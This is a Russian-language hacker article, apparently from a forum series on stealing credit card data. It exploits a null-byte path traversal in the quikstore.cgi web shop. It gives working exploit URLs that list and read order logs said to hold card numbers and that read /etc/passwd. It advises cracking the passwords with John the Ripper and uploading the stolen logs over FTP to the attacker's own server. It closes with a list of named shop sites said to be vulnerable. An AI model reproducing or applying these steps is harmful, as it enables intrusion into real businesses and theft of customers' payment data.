• Партнер

  • Привет, господа хакеры, вот вам
    продолжение серии моих статей "Как
    поиметь кред", и, если все будет оки, то
    буду писать стати на тему имения кред раз в
    неделю. Ладно, не буду вас парить
    такими темами, приступим сразу к делу.

    Итак, что вам понадобится для взлома
    веб шопа?
    1 - компьютер и доступ в интернет
    2 - чутка ума
    3 - умение пользоваться поисковой
    системой
    4 - прочитать эту статью

    Сегодня я буду вам рассказывать про
    тактику взлома quikstore.cgi. Quikstore это
    буржуйский веб шоп очень хорошего качества,
    его долго делали и много народа старалось
    над его разработкой, как обычно,
    перестарались, допустив в нем очень
    полезную для хакеров ошибку. Сколько не
    говорили про ошибку в нулевом символе,
    многие до сих пор ее не поняли. Итак, вот вам
    пример уязвимости:

    http://www.lockpickers.com/cgi-bin/ quikstore.cgi?page=../%00html&cart_id=

    Набрав у себя в браузере этот адрес, вы
    увидите, что-то типа 

    ½Y. .8. ..ˆK.html½À©Y.
    access.logÀ.Y.check_setup.cgi.
    Y.email_addresses.log°Y. language.cfg.þÚ¾Y.
    quikstore.cfg.Â.Y. quikstore.cgiþÚ.öG

    Конечно, мусора много, но разобраться в
    названиях можно. Посмотрев на всякие
    названия, мы видим каталог orders, пора нам
    в него зайти 

    http://www.lockpickers.com/cgi-bin/ quikstore.cgi?page=../orders/%00html&cart_id=

    Ага, и мы видим:

    .H ..Y. ..(.H 599201.logА,.H
    154519.logА-.H
    985367.logА..H 865125.logА/.H 315856.logА0.H
    937483.logА1.H 378887.logА2.H 169435.logА3.H
    479192.logА4.H 257362.logА5.H 115183.logА6.H
    11395.logА7.H 167788.logА8.H 559841.logА9.H
    917539.logА:.H 354163.logА;.H 299892.logА<.H
    280139.logА=.H5817.log.А>.H 350266.logА?.H
    26773.logА@.H 360859.logАA.H 199829.logАB.H
    832283.logАC.H 412408.logАD.H 508280.logАE.H
    456098.logАF.H 126968.logАG.H 183660.logАH.H
    569004.logАI.H 772139.logАJ.H 103115.logАK.H
    654675.logАL.H 884681.logАM.H 638658.logАO.H
    188875.logАP.H 225653.logАN.H 753313.logАQ.H
    898714.logАR.H 188818.logАS.H 439711.logАT.H
    927352.logАU.H 431996.logА..H 672967.logА..H
    159103.logА..H 830744.logА).H 566537.logА*.H
    253144.logА+.H 5138.log.А..H 663457.logА..H
    586008.logА..H 997506.logА..H 856583.logА..H
    693685.logА..H 655797.logА..H 814237.logА..H
    882103.logА..H 443014.logА..H 380792.logА..H
    368613.logА..H 914079.logА..H 773799.logА..H
    267996.logА..H 57162.logА..H 882551.logА..H
    259987.logА..H 312268.logА..H 994056.logА..H
    281473.logА..H 726034.logА..H 566936.logА..H
    558117.logА..H 317098.logА .H  238429.logА╝.H
    63477.logА╬.H 802520.logА..H 938229.logА÷.H
    351224.logА╫.H 390858.logА..H 735378.logА..H
    221629.logАЁ.H 15072.logА©.H 90119.logА╢.H
    823612.logА².H 347629.logА..H 891608.logА..H
    514696.logА

    Ага, много файлов с расширением .log, это и
    есть на самом деле вожделенные сс!! Теперь
    просто вводим имя файла в наш урл и видим
    всю инфу о сс. Вот смотрите:
    http://www.lockpickers.com/cgi-bin/ quikstore.cgi?page=../orders/898714.log%
    00html&cart_id=

    Но в формате, в котором все это выдается,
    смотреть неудобно, поэтому мы
    просматриваем исходники html странички и
    видим все рассортированное в удобном
    формате! Часто бывает такая фича, что нельзя
    просматривать каталоги, а значит нельзя
    увидеть номера файлов с кредами, чтобы их
    просмотреть нужно попробовать сделать вот
    как:

    http://www.lockpickers.com/cgi-bin/
    quikstore.cgi?page=../../../../../../../../ etc/passwd%00html&cart_id=

    Ага что мы поимели?? А угадайте с 3-ех раз
    :). Лана, для тех кто в бронетанке скажу,
    что мы поимели пассы этого сервака. Теперь
    просто кормим их john the ripper и ломимся через
    шелл. Но сначала подбираем пасс от юзера,
    которому разрешен шелл! А далее, найдя wwwroot и
    зайдя там в каталог orders, мы командируем

    ftp
    потом пишем open www.may-ftp-server.com
    user *****
    pas *****
    put *.log

    Ага, порядок. Мы закачали все файлы с
    расширением log к себе на фтп. Ессно с фтп мы
    можем слить все, что угодно, к примеру,
    какой-нибудь скрипт... Да, кстати, если вы
    подберете пасс от рута, то вы можете рулить
    серваком, как захотите (это для самых умных
    сказано)!!!

    Ну и напоследок пару ссылочек с дырами:
    http://www.lockpickers.com/cgi-bin/quikstore.cgi?
    page=../orders/898714.log%00html&cart_id=
    http://www.sterlingjudaica.com/cgi-bin/quikstore.cgi?
    page=../orders/%00html&cart_id=
    http://www.doityourselfpestctrl.com/cgi-
    bin/quikstore.cgi?page=../orders/%00html&cart_id=
    http://www.wellmanandwelsch.com/cgibin/quikstore.cgi?
    page=../orders%00html&cart_id=

    Подписаться
    Уведомить о
    1 Комментарий
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии